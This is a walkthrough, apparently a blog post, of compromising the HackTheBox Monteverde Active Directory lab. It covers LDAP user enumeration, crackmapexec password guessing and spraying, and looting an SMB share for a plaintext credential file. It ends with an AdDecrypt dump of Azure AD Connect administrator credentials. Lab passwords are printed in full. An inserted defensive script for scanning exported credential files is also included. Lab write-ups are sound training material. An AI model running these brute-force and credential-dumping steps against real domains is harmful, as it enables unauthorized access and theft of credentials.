Hey, fellow Hackers! Today, we’re going to dive into the Monteverde HackTheBox Active Directory Machine. Let’s start scanning without wasting time :)
Scanning
Let’s start by scanning the target IP with nmap:
nmap -F -sV 10.10.10.172
The result showed several open ports and the domain MEGABANK.LOCAL.
I tried a zone transfer on port 53, which didn’t work, and share enumeration with smbmap, which didn’t work either.
LDAP Enumeration
Enumerating Naming Context
ldapsearch -H ldap://10.10.10.172 -x -s base namingcontexts
Then I searched for users and found some:
ldapsearch -x -H ldap://10.10.10.172 -D 'CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL' -b 'DC=MEGABANK,DC=LOCAL' | grep userPrincipalName | sed 's/userPrincipalName: //'
I saved them in a file named user.txt:
$ cat user.txt
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
Using enum4linux I found that the account lockout threshold is None:
enum4linux 10.10.10.172
This means we can brute-force the passwords of the users we found with the crackmapexec tool:
crackmapexec smb 10.10.10.172 -u user.txt -p user.txt
Here I am using user.txt as the password list too.
The result showed that SABatchJobs works as both the username and the password.
Then I started enumerating with smbclient using these credentials:
smbclient -L //10.10.10.172/ --user 'SABatchJobs' --password 'SABatchJobs'
I got a list of shares. I first tried accessing azure_uploads
but found nothing there :\
Then I accessed the users$ share and found some user directories.
Then, using recurse ON, I listed all files and sub-directories inside them:
smb: \> recurse ON
smb: \> ls
. D 0 Fri Jan 3 18:42:48 2020
.. D 0 Fri Jan 3 18:42:48 2020
dgalanos D 0 Fri Jan 3 18:42:30 2020
mhope D 0 Fri Jan 3 19:11:18 2020
roleary D 0 Fri Jan 3 18:40:30 2020
smorgan D 0 Fri Jan 3 18:40:24 2020
\dgalanos
. D 0 Fri Jan 3 18:42:30 2020
.. D 0 Fri Jan 3 18:42:30 2020
\mhope
. D 0 Fri Jan 3 19:11:18 2020
.. D 0 Fri Jan 3 19:11:18 2020
azure.xml AR 1212 Fri Jan 3 19:10:23 2020
\roleary
. D 0 Fri Jan 3 18:40:30 2020
.. D 0 Fri Jan 3 18:40:30 2020
\smorgan
. D 0 Fri Jan 3 18:40:24 2020
.. D 0 Fri Jan 3 18:40:24 2020
31999 blocks of size 4096. 28979 blocks available
smb: \>
Here I found an azure.xml file inside the mhope user directory, and using get I downloaded it to my system:
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \mhope\> exit
After reading the content of azure.xml I found a password:
$ cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
Using password spraying with crackmapexec I found that this password is valid for the mhope user :)
$ crackmapexec smb 10.10.10.172 -u user.txt -p '4n0therD4y@n0th3r$'
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$
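azure.xml is the CLIXML format that PowerShell's Export-Clixml produces, and files like it end up on shares whenever an administrator serialises a credential object to disk. As an added example that is not part of this writeup, the following Python script parses that format, walks every serialised object and reports which string properties carry secret-looking names (reporting only the value's length, never the value), so a defender can sweep file shares for exported credential objects like this one. The sample document is constructed to mirror azure.xml with a placeholder password; SECRET_MARKERS and the function names are my own choices.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

CLIXML_NS = "http://schemas.microsoft.com/powershell/2004/04"
NS = {"ps": CLIXML_NS}
# Property names that usually hold a secret when an object is saved with Export-Clixml.
SECRET_MARKERS = ("password", "secret", "token", "apikey")


def decode_clixml(raw: bytes) -> str:
    # Export-Clixml writes UTF-16 with a BOM by default; UTF-8 with or without a BOM
    # (for example a hand-written or re-saved file) is accepted as well.
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


def find_secret_properties(raw: bytes) -> List[Dict[str, str]]:
    # One finding per <S> (string) property whose name looks like a secret. Only the value's
    # length is reported, so the scan result can be shared without copying the secret.
    root = ET.fromstring(decode_clixml(raw))
    if root.tag != f"{{{CLIXML_NS}}}Objs":
        return []  # not a CLIXML document
    findings: List[Dict[str, str]] = []
    for obj in root.iter(f"{{{CLIXML_NS}}}Obj"):
        type_names = [t.text or "" for t in obj.findall("ps:TN/ps:T", NS)]
        props = obj.find("ps:Props", NS)
        if props is None:
            continue
        for prop in props.findall("ps:S", NS):
            name = prop.get("N", "")
            if any(marker in name.lower() for marker in SECRET_MARKERS):
                findings.append({"type": type_names[0] if type_names else "<unknown>",
                                 "property": name, "value_length": str(len(prop.text or ""))})
    return findings


# Constructed sample mirroring the layout of azure.xml above; the password is a placeholder.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0"><T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T></TN>
    <Props>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">placeholder-secret-42</S>
    </Props>
  </Obj>
</Objs>"""

if __name__ == "__main__":
    for finding in find_secret_properties(SAMPLE_CLIXML.encode("utf-16")):
        print(finding)
```

Point it at the raw bytes of each *.xml found under a share and any PSADPasswordCredential or PSCredential hit is a file to rotate and remove.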
Then I logged in as mhope with the evil-winrm utility:
evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
Got user.txt :)
After checking this user’s group memberships I found some interesting groups.
Searching Google for an Azure AD Connect exploit turned up some interesting pages.
After a bit of reading I found this page, which worked like a charm: https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/
Exploitation Steps For Administrator
I downloaded the AdDecrypt binary from here: https://github.com/VbScrub/AdSyncDecrypt/releases
After downloading it I uploaded it to the target system.
To run it we need to change our location to C:\Program Files\Microsoft Azure AD Sync\Bin:
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Documents\AdDecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
After executing it we found the administrator password.
Using evil-winrm I logged in as administrator and found root.txt too :)
BOOMM!! Monteverde Machine Completed Successfully :)